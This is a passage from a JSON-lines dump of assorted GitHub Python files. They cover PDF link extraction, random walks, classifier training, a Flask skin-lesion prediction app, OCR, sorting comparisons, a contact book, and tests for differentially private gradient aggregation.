hyperlinks: List[str] = []\n\n subtract_text(\n pages,\n paragraph_start,\n paragraph_end,\n on_page_read=lambda x: hyperlinks.extend(\n get_hyperlinks_from_text(x)\n )\n )\n\n if unique:\n hyperlinks = list(set(hyperlinks))\n\n return hyperlinks\n\n\ndef prepare(cli_args: Dict) -> None:\n \"\"\"Prepares the system\"\"\"\n logger = logging.getLogger(\"pypdf\")\n logger.setLevel(logging.ERROR)\n\n assert cli_args[\"filename\"].endswith(\".pdf\")\n assert cli_args[\"page_start\"] <= cli_args[\"page_end\"]\n\n if cli_args[\"page_start\"] == cli_args[\"page_end\"]:\n assert cli_args[\"paragraph_start\"] <= cli_args[\"paragraph_end\"]\n\n\ndef entrypoint() -> None:\n \"\"\"Entrypoint\"\"\"\n cli_args = get_cli_args()\n prepare(cli_args)\n\n pdf_instance = get_pdf(cli_args[\"filename\"])\n\n pages = get_pages(\n pdf_instance,\n cli_args[\"page_start\"],\n cli_args[\"page_end\"]\n )\n\n hyperlinks = get_hyperlinks(\n pages,\n cli_args[\"paragraph_start\"],\n cli_args[\"paragraph_end\"],\n unique=cli_args[\"unique\"]\n )\n\n print(hyperlinks)\n\n\nif __name__ == \"__main__\":\n entrypoint()\n","repo_name":"jofaval/utilities","sub_path":"python/get_links_from_pdf.py","file_name":"get_links_from_pdf.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"19094692906","text":"\"\"\" randomWalker3D_iso.py\n\nmodule implementing 3D random walker\n\nSupplementary material for the lecture \"Computational Photonics\" held at \nLeibniz University Hannover in summer term 2017\n\nDATE: 2017-05-02\nAUTHOR: O. Melchert\n\"\"\"\nimport random\nfrom randomVariateGenerator import UnitSphere\n\nclass RandomWalker3D_iso(object):\n \"\"\"isotropic random walker in 3D space\"\"\"\n def __init__(self, r=random.random, x0=(0,0,0), w0=(0,0,1) ):\n \"\"\"instance of 1D random walker class\n\n Args: \n x0 (3-tuple, floats) starting point of walk (default: x0=(0,0,0))\n w0 (3-tuple, floats) ini directional cosines (default: w0=(0,0,1))\n r (function) random number generator\n\n Attrib:\n x (3-tuple, float) current walker position\n w (3-tuple, float) current directional cosines\n nSteps (int) number of steps taken\n wSamp (object) directional cosine sampler\n \"\"\"\n self.x0 = x0\n self.w = w0\n self.x = x0\n self.nSteps = 0\n self.wSamp = UnitSphere(r).generate\n\n def step(self):\n \"\"\"perform single step\n \"\"\"\n ux, uy, uz = self.x\n wx, wy, wz = self.w \n \n self.x = (ux+wx, uy+wy, uz+wz)\n self.w = self.wSamp()\n self.nSteps += 1\n\n\n\n# EOF: randomWalker3D_iso.py\n","repo_name":"omelchert/CompTissueOpt-2017","sub_path":"2017-05-03-Lecture02/src/randomWalker3D_iso.py","file_name":"randomWalker3D_iso.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11384109017","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 7 10:23:15 2019\r\n\r\n@author: HAR-UP\r\n\"\"\"\r\n\r\nfrom sklearn import svm\r\nfrom sklearn.ensemble import RandomForestClassifier as RndFC\r\nfrom sklearn.neural_network import MLPClassifier as ffp\r\nfrom sklearn.neighbors import KNeighborsClassifier as KNN\r\nimport pandas as pd\r\nfrom sklearn import metrics as met\r\n\r\n\r\ndef training(concept,\r\n t_window = ['1&0.5','2&1','3&1.5'],\r\n methods = ['RF','SVM', 'MLP', 'KNN'],\r\n K=10):\r\n \r\n for cncpt in concept:\r\n print(cncpt)\r\n \r\n for twnd in t_window:\r\n print('--%s' % twnd) \r\n path = '%s//%s//' % (cncpt,twnd)\r\n #Each fold's accuracy is stored\r\n acc_k = []\r\n for k in range(1,K+1):\r\n print('-----Fold %d:' % k)\r\n \r\n #Training and testing sets are opened with pandas\r\n training_set = pd.read_csv('%sSelectedFeatures_%s_%s_train%d.csv'%(path,twnd,cncpt,k))\r\n testing_set = pd.read_csv('%sSelectedFeatures_%s_%s_test%d.csv'%(path,twnd,cncpt,k))\r\n \r\n #Training data set is split into inputs (X) and outputs (Y)\r\n training_set_X = training_set.drop(training_set.columns[-1],axis=1)\r\n training_set_Y = training_set[training_set.columns[-1]]\r\n \r\n #Testing data is split\r\n testing_set_X = testing_set.drop(testing_set.columns[-1],axis=1)\r\n expected_output = testing_set[testing_set.columns[-1]].values\r\n \r\n #Each method's accuracy is stored\r\n acc_method = []\r\n for method in methods:\r\n if method == 'RF':\r\n classifier = RndFC(n_estimators=100)\r\n elif method == 'SVM':\r\n classifier = svm.SVC(gamma='auto', kernel = 'poly')\r\n elif method == 'MLP': \r\n classifier = ffp()\r\n else:\r\n classifier = KNN()\r\n classifier.fit(training_set_X, training_set_Y)\r\n \r\n #The classifier is tested\r\n estimates = classifier.predict(testing_set_X)\r\n accuracy = met.accuracy_score(expected_output,estimates)\r\n print('-----------%s Accuracy: %f' % (method, accuracy))\r\n acc_method.append(accuracy)\r\n acc_k.append(acc_method)\r\n print('---%s scores:' % twnd)\r\n for i in range(0,len(methods)):\r\n avg_accuracy = 0\r\n for k in range(0,K):\r\n avg_accuracy += acc_k[k][i]\r\n avg_accuracy = avg_accuracy/K\r\n print('------%s Avg. Accuracy: %f' %(methods[i],avg_accuracy))\r\n\r\ndef main():\r\n concept = []\r\n training(concept)\r\n print('\\nEnd of task')\r\n\r\n \r\nif __name__==\"__main__\":\r\n main()\r\n","repo_name":"jpnm561/HAR-UP","sub_path":"K-crossValidation/Training_function.py","file_name":"Training_function.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"83"} +{"seq_id":"1457277416","text":"from __future__ import division, print_function\n# coding=utf-8\nimport sys\nimport os\nimport PIL\nimport glob\nimport re\nimport numpy as np\nimport gdown\n\n\n# Keras\nfrom keras.models import load_model\nfrom keras.preprocessing import image\nfrom PIL import Image\n\n# Flask utils\nfrom flask import Flask, redirect, url_for, request, render_template\nfrom werkzeug.utils import secure_filename\n\n\n# Define a flask app\napp = Flask(__name__)\napp.config['UPLOAD_PATH'] = 'uploads'\n\n# Model saved with Keras model.save()\nurl = 'https://drive.google.com/uc?id=1Ql7jwGUl1EeYOoPAxs7u3FUNrHgU9Zlz'\noutput = 'ful_skin_cancer_model.h5'\ngdown.download(url, output, quiet=False)\nMODEL_PATH = 'Virtual_doc/ful_skin_cancer_model.h5'\n\n# Load your trained model\nmodel = load_model(MODEL_PATH)\nmodel.make_predict_function()\nprint('Model loaded. Start serving...')\nprint('Model loaded. Check http://127.0.0.1:5000/')\n\n\ndef model_predict(img_path, model):\n x=image.load_img(img_path)\n x=x.resize((224,224))\n x = np.expand_dims(x, axis=0)\n x=np.asarray(x)\n preds = model.predict(x)\n return preds\n\n\n@app.route('/', methods=['GET'])\ndef index():\n # Main page\n return render_template('skin.html')\n \n\n\n@app.route('/home', methods=['GET', 'POST'])\ndef home():\n if request.method == 'POST':\n # Get the file from post request\n file = request.files['skinpic']\n\n # Save the file to ./uploads\n basepath = os.path.dirname(__file__)\n filename = secure_filename(file.filename)\n file_path = os.path.join(\n basepath, 'static', 'uploads', filename)\n file.save(file_path)\n \n\n # Make prediction\n preds = model_predict(file_path, model)\n lesion_type_dict = {\n 'nv': 'Melanocytic nevi',\n 'mel': 'Melanoma',\n 'bkl': 'Benign keratosis-like lesions ',\n 'bcc': 'Basal cell carcinoma',\n 'akiec': 'Actinic keratoses',\n 'vasc': 'Vascular lesions',\n 'df': 'Dermatofibroma'\n }\n nv = round(round(preds[0,0], 5)*100, 2)\n mel = round(round(preds[0,1], 5)*100, 2)\n bkl = round(round(preds[0,2], 2)*100, 2)\n bcc = round(round(preds[0,3], 2)*100, 2)\n akiec = round(round(preds[0,4], 2)*100, 2)\n vasc = round(round(preds[0,5], 2)*100, 2)\n df = round(round(preds[0,6], 2)*100, 2)\n result = np.array([nv, mel, bkl, bcc, akiec, vasc, df])\n\n\n # Process your result for human\n # pred_class = preds.argmax(axis=-1) # Simple argmax\n # pred_class = decode_predictions(preds, top=1) # ImageNet Decode\n # result = str(pred_class[0][0][1]) # Convert to string\n #return result\n return render_template('predict.html', data=result)\n \n \n\n@app.route('/find', methods=['POST'])\ndef find():\n query=request.form.get('query')\n query= \"skin clincs in\" + query\n s = []\n\n try: \n from googlesearch import search \n except ImportError: \n print(\"No module named 'google' found\") \n \n # to search \n for j in search(query, tld=\"co.in\", num=5, stop=6, pause=2): \n s+=[j]\n a=s[0]\n b=s[1]\n c=s[2]\n d=s[3]\n e=s[4]\n g=s[5]\n c=np.array([a, b, c, d, e, g])\n return render_template('blank.html', data=c)\n \n \n@app.route('/uploads/')\ndef upload(filename):\n return send_from_directory(app.config['UPLOAD_PATH'], filename) \n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"devadutt-github/Virtual_doc","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"70246452431","text":"# -*- encoding:utf-8 -*-\n\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nfrom src.Networking import game_user_manager\n\nclass GameHallRankList(QListView):\n def __init__(self, parent=None):\n QListView.__init__(self, parent)\n self.setStyleSheet(\n '''\n border-image: url(:btn_bg);\n background-repeat: no-repeat;\n ''')\n\n self.model = QStandardItemModel()\n self.setModel(self.model)\n self.setWordWrap(True)\n self.setUniformItemSizes(True)\n self.setGridSize(QSize(self.rect().width(), 30))\n self.setFont(QFont(\"Microsoft YaHei\", 10))\n self.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.setFocusPolicy(Qt.NoFocus)\n self.setSelectionMode(QAbstractItemView.NoSelection)\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.setAcceptDrops(True)\n\n self.connect(game_user_manager.GameUserManager(), SIGNAL(\"refreshRank\"),\n self.refresh)\n\n def refresh(self):\n self.model.clear()\n rank = 0\n for user in game_user_manager.GameUserManager().userScore:\n if 'uid' in user and 'score' in user:\n text = user['uid'] + ' : ' + str(user['score'])\n item = QStandardItem(text)\n item.setTextAlignment(Qt.AlignCenter)\n item.setFont(QFont(50))\n if rank == 0:\n item.setForeground(QBrush(QColor(255, 0, 0)))\n if rank == 1:\n item.setForeground(QBrush(QColor(200, 0, 0)))\n if rank == 2:\n item.setForeground(QBrush(QColor(150, 0, 0)))\n self.model.appendRow(item)\n rank += 1\n","repo_name":"caiwb/5In1RowClient","sub_path":"src/GameHall/game_hall_rank_list.py","file_name":"game_hall_rank_list.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"83"} +{"seq_id":"40270902670","text":"# -*- mode: python ; coding: utf-8 -*-\nfrom PyInstaller.utils.hooks import collect_submodules\nimport glob\n\nblock_cipher = None\n\nhidden_battlesim = collect_submodules('sbbbattlesim')\nhidden_tracker = [ file[2:].replace(\"/\", \".\").replace(\"\\\\\", \".\").replace(\".py\", \"\") for file in glob.glob(\"./sbbtracker/lang/lang_*.py\") ]\n\nprint(collect_submodules('./sbbtracker/lang/'))\na = Analysis(['sbbtracker/application.py'],\n pathex=[],\n binaries=[],\n datas=[],\n hiddenimports=hidden_battlesim+hidden_tracker,\n hookspath=[],\n hooksconfig={},\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\na.datas += [('assets/sbbt.ico', 'assets/sbbt.ico', 'DATA')]\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\n\nexe = EXE(pyz,\n a.scripts, \n [],\n exclude_binaries=True,\n name='SBBTracker',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n console=False,\n disable_windowed_traceback=False,\n target_arch=None,\n codesign_identity=None,\n entitlements_file=None , icon='assets/sbbt.ico')\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas, \n strip=False,\n upx=True,\n upx_exclude=[],\n name='SBBTracker')\n","repo_name":"SBBTracker/SBBTracker","sub_path":"SBBTracker.spec","file_name":"SBBTracker.spec","file_ext":"spec","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"83"} +{"seq_id":"44088451301","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport json\n\ndef swap(arr, i, j):\n temp = arr[i]\n arr[i] = arr[j]\n arr[j] = temp\n\nclass Sort(object):\n counts = 0\n\n def insertionSort(self, x):\n arr = np.array(x)\n for i in range(1, x.size):\n j = i\n while j >= 1 and arr[j] < arr[j-1]:\n Sort.counts += 1\n swap(arr, j, j-1)\n j = j - 1\n return arr\n \n def mergeSort(self, arr):\n result = np.array([])\n if arr.size < 5:\n result = self.insertionSort(np.array(arr))\n else:\n result = np.zeros(arr.size)\n halfway = int(arr.size / 2)\n list1 = np.array(arr[0:halfway])\n list2 = np.array(arr[halfway::])\n list1 = self.mergeSort(list1)\n list2 = self.mergeSort(list2)\n i1 = 0\n i2 = 0\n i = 0\n while i1 < list1.size and i2 < list2.size:\n if list1[i1] < list2[i2]:\n result[i] = list1[i1]\n i1 += 1\n else:\n result[i] = list2[i2]\n i2 += 1\n i += 1\n Sort.counts += 1\n while i1 < list1.size:\n result[i] = list1[i1]\n i1 += 1\n i += 1\n Sort.counts += 1\n while i2 < list2.size:\n result[i] = list2[i2]\n i2 += 1\n i += 1\n Sort.counts += 1\n return result\n\"\"\"\ns = Sort()\nnp.random.seed(0)\n\nnum_per_size = 50\nsizes = []\nsteps1 = []\nsteps2 = []\nfor n in range(10, 400):\n print(n)\n for i in range(num_per_size):\n sizes.append(n)\n x = np.random.randint(0, n*2, n)\n x1 = s.insertionSort(x)\n steps1.append(Sort.counts)\n Sort.counts = 0\n x2 = s.mergeSort(x)\n steps2.append(Sort.counts)\n x = np.sort(x)\n if not np.allclose(x, x1):\n print(\"insertion sort failed\")\n if not np.allclose(x, x2):\n print(\"Merge sort failed\")\n\njson.dump({'sizes':sizes, 'steps1':steps1, 'steps2':steps2}, open(\"steps.txt\", \"w\"))\n\"\"\"\nres = json.load(open(\"steps.txt\"))\nsizes, steps1, steps2 = res['sizes'], res['steps1'], res['steps2']\n\nsizes = np.array(sizes)\nsteps1 = np.array(steps1)\nsteps2 = np.array(steps2)\n\nplt.figure(figsize=(12, 8))\nplt.scatter(steps1, steps2, c=sizes, cmap='afmhot')\nplt.xlabel(\"Insertion Sort Steps\")\nplt.ylabel(\"Merge Sort Steps\")\nplt.title(\"Merge Sort / Insertion Sort Comparison\")\nplt.colorbar()\nax = plt.gca()\nax.set_facecolor((0.6, 0.6, 0.6))\nplt.savefig(\"Timings.svg\", bbox_inches='tight')","repo_name":"Ursinus-CS173-S2020/CoursePage","sub_path":"Modules/Lab11_Recursion/Sorting.py","file_name":"Sorting.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29837966484","text":"import sys\nimport fileinput\n\n\nclass Guide:\n \"\"\"Объект справочник.\n\n выполняет команды взаимодействующие с txt файлом/бд:\n add_contact(self.params) - добавляет запись о кнтакте в бд;\n get_contact - возвращает список контактов;\n edit_contact(self.params) - находит контакт, который нужно изменить\n по id и меняет значения у параметров переданых в params;\n find_contact(self.params) - находит контакт по указанным параметрам и\n выводит его в консоль;\n сохраняются данные вследующем виде:\n id/surname/name/company/privat_phone/work_phone\n \"\"\"\n def __init__(self, input_data):\n self.params = input_data\n\n def add_contact(self) -> None:\n \"\"\"Функция сохранения контакта в справочник.\n\n принимает на вход данные контакта и сохраняет их в бд\n \"\"\"\n with open('./contact_base.txt', 'r+') as file:\n index = len(file.readlines())\n file.write(\n f'{index}/{self.params[\"surname\"]}/{self.params[\"name\"]}/'\n f'{self.params[\"middle_name\"]}/{self.params[\"company\"]}/'\n f'{self.params[\"privat_phone\"]}/{self.params[\"work_phone\"]}\\n'\n )\n return 'Контакт успешно сохранен!'\n\n def get_contact(self):\n \"\"\"Метод возвращающий все данные из справочника.\"\"\"\n with open('./contact_base.txt', 'r') as file:\n data = file.read()\n return data\n\n def edit_contact(self) -> None:\n \"\"\"Функция редактирования для справочника.\n\n принимает на вход словарь вида: параметр-значение,\n меняет все выбранные поля и выводит сообщение об успешном\n выполнении команды.\n \"\"\"\n param_indexes = {\n 'surname': 1,\n 'name': 2,\n 'middle_name': 3,\n 'company': 4,\n 'private_phone': 5,\n 'work_phone': 6\n }\n if len(self.params) > 1:\n item_id = self.params.pop('id')\n for line in fileinput.input('./contact_base.txt', inplace=1):\n line = line.split('/')\n if line[0] == item_id:\n for param, new_value in self.params.items():\n line[param_indexes[param]] = new_value\n sys.stdout.write('/'.join(line))\n return 'Данные успешно обновлены'\n else:\n return 'Никаких изменений применено не было.'\n\n def find_contact(self):\n \"\"\"Метод поиска контактов по параметрам.\"\"\"\n with open('./contact_base.txt', 'r') as file:\n for line in file.readlines():\n if set(self.params).issubset(line.split('/')):\n return line\n else:\n return 'Данные с указанными значениями не найдены'\n\n\ndef command_manager(command, values={}):\n try:\n print(getattr(Guide(values), command)())\n except KeyError as exception:\n print(f'Данное/ые значение/я отсутствует: {exception}')\n except AttributeError:\n print('Эта комманда не поддерживается.')\n\n\nif __name__ == '__main__':\n while True:\n command, *values = input().split(' ')\n if command == 'exit':\n break\n try:\n dict_values = dict(value.split('=') for value in values)\n command_manager(command, dict_values)\n except ValueError:\n print(\n 'Данные указаны неверно, тестовый пример:'\n 'add_contact name=value surname=value middle_name=value'\n 'company=value privat_phone=value work_phone=value'\n )\n","repo_name":"Grindelwaldoff/task_interview_effective_mobile","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27585164023","text":"import pytesseract\nimport sys\nfrom glob import glob\nimport os\nfrom os.path import basename\n\ndef image_ocr(image_path, output_txt_file_name):\n # Configuration details for psm given by the command: \n # tesseract --help-psm\n image_text = pytesseract.image_to_string(image_path, lang='eng+ces', config='--psm 6')\n with open(output_txt_file_name, 'w+', encoding='utf-8') as f:\n f.write(image_text)\n\ndef main():\n inputdir = sys.argv[1]\n outputdir = sys.argv[2]\n for input_filename in glob(inputdir + '/*.png'):\n print(input_filename)\n filename = basename(input_filename)\n output_filename = '{outputdir}{sep}{filename}'.format(outputdir=outputdir \n , sep=os.sep\n , filename=filename.replace('.png','.txt')) \n image_ocr(input_filename, output_filename)\n\nif __name__ == '__main__':\n main()","repo_name":"nickynicolson/index-CGE-world-collections","sub_path":"pytesseractwrapper.py","file_name":"pytesseractwrapper.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"28868767556","text":"# 1,2,3\n# [[1,2],[2,3]]\n[0.5, 0.3]\n\ndef find_path(start, end, paths, probs):\n queue_nodes = [start]\n node_edges = {}\n # O(m)\n for i in range(len(paths)):\n first = paths[i][0]\n second = paths[i][1]\n if first in node_edges:\n node_edges[first].append(i)\n else:\n node_edges[first] = [i]\n if second in node_edges:\n node_edges[second].append(i)\n else:\n node_edges[second] = [i]\n\n res = []\n queue_edges = []\n # for node in queue_nodes:\n queue_edges = node_edges[start]\n while len(queue_nodes) != 0:\n vals = [probs[i] for i in queue_edges]\n min_val = max(vals)\n min_ind = vals.index(min_val)\n queue_edges.remove(queue_edges[min_ind])\n vals.remove(min_val)\n\n remove_path_ind = queue_edges[min_ind]\n remove_path = paths[remove_path_ind]\n \n res.append(remove_path)\n if remove_path[0] in queue_nodes:\n queue_nodes.remove(remove_path[0])\n queue_edges.append(node_edges[remove_path[1]])\n elif remove_path[1] in queue_nodes:\n queue_nodes.remove(remove_path[1])\n queue_edges.append(node_edges[remove_path[0]])\n\n if remove_path[1] == end or remove_path[0] == end:\n break\n return res\n\nif __name__ == '__main__':\n\n paths = [[1,2],[1,3],[1,4],[2,4],[3,4]]\n probs = [0.2, 0.5,0.4,0.5,0.1]\n res = find_path(1,4,paths, probs)\n print(res)","repo_name":"AllenLiuX/My-LeetCode","sub_path":"temp/cycle.py","file_name":"cycle.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"20824128708","text":"class Node:\n def __init__(self,data):\n self.data=data\n self.next=None\nclass LinkedList:\n def __init__(self):\n self.head=None\n def append(self,data):\n new_node=Node(data)\n if(self.head==None):\n self.head=new_node\n return\n else:\n last_node=self.head\n while last_node.next:\n last_node=last_node.next\n last_node.next=new_node\n def print_list(self):\n head_node=self.head\n while head_node:\n print(head_node.data)\n head_node=head_node.next\nllist = LinkedList()\nllist.append(\"A\")\nllist.append(\"B\")\nllist.append(\"C\")\nllist.append(\"D\")\n\n\nllist.print_list() \nllist.append(87)\nllist.append(80)\nllist.print_list()\n","repo_name":"narayanaly/python_learning","sub_path":"single_linked_list_insertion.py","file_name":"single_linked_list_insertion.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9168713787","text":"import gc\nimport sys\nfrom torch.autograd import Variable\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.optim.lr_scheduler\ntorch.backends.cudnn.benchmark = True\n\nimport dataset\nfrom models.AlexNet import *\nfrom models.ResNet import *\nfrom models.SENet import *\nfrom tqdm import tqdm\nimport platform\n\nimport torchvision.models as models\n# resnet18 = models.resnet18()\n# alexnet = models.alexnet()\n# vgg16 = models.vgg16()\n# squeezenet = models.squeezenet1_0()\n# densenet = models.densenet161()\n# inception = models.inception_v3()\n\n\n# Parameters\nnumber_of_epochs = 500\noutput_period = 100\nsize_of_batch = 50\nmodel_to_use = senet154()\n\ndef run(num_epochs, out_period, batch_size, model):\n # setup the device for running\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n model = model.to(device)\n\n train_loader, val_loader = dataset.get_data_loaders(batch_size)\n num_train_batches = len(train_loader)\n\n criterion = nn.CrossEntropyLoss().to(device)\n # optimizer is currently unoptimized\n # there's a lot of room for improvement/different optimizers\n # optimizer = optim.SGD(model.parameters(), lr=1e-3, nesterov=True)\n optimizer = optim.Adam(model.parameters(), lr=1e-3)\n # optimizer = optim.Nesterov(model.parameters(), lr=1e-3)\n\n # printAccuracy(train_loader, device, model, \"TRAINSET\", 1)\n\n epoch = 1\n while epoch <= num_epochs:\n running_loss = 0.0\n for param_group in optimizer.param_groups:\n param_group['lr'] = max(param_group['lr'] * 0.97, 1e-4)\n tqdm.write('Current learning rate: ' + str(param_group['lr']))\n model.train()\n\n for batch_num, (inputs, labels) in enumerate(tqdm(train_loader), 1):\n inputs = inputs.to(device)\n labels = labels.to(device)\n # print(labels)\n # print(labels.size())\n\n optimizer.zero_grad()\n outputs = model(inputs)\n # outputs, aux = model(inputs)\n # print(outputs.size())\n # print(torch.topk(outputs,5))\n # top5 = torch.topk(outputs,5)[1]\n # top52 = torch.topk(outputs,5)[0]\n # for i in range(len(inputs)):\n # print(\"\\n\\nyooooooooo\", i, \"\\n\\n\\n\", labels[i].item(),\"\\n\", top5[i], top52[i])\n # print(top5[i][0])\n loss = criterion(outputs, labels)\n loss.backward()\n\n optimizer.step()\n running_loss += loss.item()\n\n if batch_num % out_period == 0:\n tqdm.write('[%d:%.2f] loss: %.3f' %\n (epoch, batch_num * 1.0 / num_train_batches,\n running_loss / out_period))\n running_loss = 0.0\n gc.collect()\n\n gc.collect()\n # save after every epoch\n torch.save(model.state_dict(), \"models/model.%d\" % epoch)\n\n # Calculate classification error and Top-5 Error\n # on training and validation datasets here\n model.eval()\n try:\n printAccuracy(train_loader, device, model, \"TRAINSET\", epoch)\n printAccuracy(val_loader, device, model, \"VALSET\", epoch)\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n pass\n\n\n gc.collect()\n epoch += 1\n\ndef printAccuracy(loader, device, model, name, epoch, max_iters=10000):\n num1 = 0\n num5 = 0\n total = 0\n iterator = tqdm(loader)\n for (inputs, labels) in iterator:\n inputs = inputs.to(device)\n labels = labels.to(device)\n outputs = model(inputs)\n top5 = torch.topk(outputs, 5)[1]\n # top1 = torch.topk(outputs,1)[1]\n for i in range(len(inputs)):\n # print(\"\\nlabel:\", labels[i].item(),\"\\nTop 5:\", top5[i])\n top1 = top5[i][0]\n num1 += 1 if labels[i].item() == top1.item() else 0\n num5 += 1 if labels[i].item() in top5[i] else 0\n total += 1\n if total > max_iters:\n iterator.close()\n break\n tqdm.write(\"{} {} TOP 1: {}\".format(epoch, name, num1/total))\n tqdm.write(\"{} {} TOP 5: {}\".format(epoch, name, num5/total))\n\n\nif __name__ == '__main__' and platform.system() == \"Windows\":\n tqdm.write('Starting training')\n run(number_of_epochs, output_period, size_of_batch, model_to_use)\n tqdm.write('Training terminated')\nelif platform.system() != \"Windows\":\n tqdm.write('Starting training NOTWINDOWS')\n run(number_of_epochs, output_period, size_of_batch, model_to_use)\n tqdm.write('Training terminated')\n","repo_name":"amrahm/6819Miniplaces","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12390881873","text":"import collections\n\nfrom jax import numpy as jnp\nimport tensorflow as tf\nimport tensorflow_federated as tff\n\nfrom multi_epoch_dp_matrix_factorization.dp_ftrl.centralized import gradient_processors\n\n\ndef _build_no_privacy_scalar_tree_agg(clip_norm=1.0):\n record_specs = tf.TensorSpec(shape=[], dtype=tf.float32)\n aggregator = tff.aggregators.DifferentiallyPrivateFactory.tree_aggregation(\n noise_multiplier=0.0,\n # Our implementation only passes *one* value through to the\n # aggregator, and does not want any normalization inside the aggregator.\n clients_per_round=1,\n l2_norm_clip=clip_norm,\n record_specs=record_specs,\n noise_seed=0,\n use_efficient=True,\n )\n return aggregator.create(tff.to_type(tf.float32))\n\n\nclass GradientProcessorsTest(tf.test.TestCase):\n\n def test_noprivacy_processor_builds_and_runs(self):\n num_microbatches = 10\n grad_processor = gradient_processors.NoPrivacyGradientProcessor()\n state = grad_processor.init()\n batched_grads = jnp.array([1.0] * num_microbatches)\n state, grad_estimate = grad_processor.apply(state, batched_grads)\n self.assertAllClose(grad_estimate, 1.0)\n\n def test_constructs_and_runs_from_tree_aggregator(self):\n num_microbatches = 10\n aggregator = _build_no_privacy_scalar_tree_agg()\n grad_processor = gradient_processors.DPAggregatorBackedGradientProcessor(\n aggregator, l2_norm_clip=1.0\n )\n state = grad_processor.init()\n batched_grads = jnp.array([1.0] * num_microbatches)\n state, grad_estimate = grad_processor.apply(state, batched_grads)\n self.assertAllClose(grad_estimate, 1.0)\n\n def test_constructs_and_runs_tree_agg_with_model_structure(self):\n num_microbatches = 10\n record_specs = collections.OrderedDict(\n a=tf.TensorSpec(shape=[100, 100], dtype=tf.float32),\n b=tf.TensorSpec(shape=[100], dtype=tf.float32),\n )\n factory = tff.aggregators.DifferentiallyPrivateFactory.tree_aggregation(\n noise_multiplier=0.0,\n clients_per_round=1,\n l2_norm_clip=1.0,\n record_specs=record_specs,\n noise_seed=0,\n use_efficient=True,\n )\n aggregator = factory.create(tff.to_type(record_specs))\n grad_processor = gradient_processors.DPAggregatorBackedGradientProcessor(\n aggregator, l2_norm_clip=1.0\n )\n state = grad_processor.init()\n # Jax returns our per-example gradients as dicts, so we test against this\n # here.\n batched_grads = dict(\n a=jnp.array([jnp.ones(shape=[100, 100])] * num_microbatches),\n b=jnp.array([jnp.ones(shape=[100])] * num_microbatches),\n )\n # We compute the l2 norm of each 'per-example' gradient; since the clipping\n # norm is 1.0, dividing by this will yield the per-element expected value of\n # the result.\n argument_l2_norm = (100**2 + 100) ** 0.5\n expected_result = dict(\n a=jnp.array(jnp.ones(shape=[100, 100]) / argument_l2_norm),\n b=jnp.array(jnp.ones(shape=[100])) / argument_l2_norm,\n )\n state, grad_estimate = grad_processor.apply(state, batched_grads)\n self.assertAllClose(grad_estimate, expected_result)\n\n def test_aggregator_clips_and_sums(self):\n num_microbatches = 10\n clip_norm = 0.5\n aggregator = _build_no_privacy_scalar_tree_agg(clip_norm=clip_norm)\n grad_processor = gradient_processors.DPAggregatorBackedGradientProcessor(\n aggregator, l2_norm_clip=clip_norm\n )\n state = grad_processor.init()\n batched_grads = jnp.array([2.0] * num_microbatches)\n state, grad_estimate = grad_processor.apply(state, batched_grads)\n # The incoming values should have been clipped and then averaged.\n self.assertAllClose(grad_estimate, clip_norm)\n\n def test_only_clips_values_over_norm(self):\n num_microbatches = 10\n clip_norm = 0.5\n aggregator = _build_no_privacy_scalar_tree_agg(clip_norm=clip_norm)\n grad_processor = gradient_processors.DPAggregatorBackedGradientProcessor(\n aggregator, l2_norm_clip=clip_norm\n )\n state = grad_processor.init()\n batched_grads = jnp.array(\n [0.25] * (num_microbatches // 2) + [2.0] * (num_microbatches // 2)\n )\n state, grad_estimate = grad_processor.apply(state, batched_grads)\n expected_mean = (0.25 + 0.5) / 2\n # The incoming values should have been clipped and then averaged.\n self.assertAllClose(grad_estimate, expected_mean)\n\n\nif __name__ == '__main__':\n 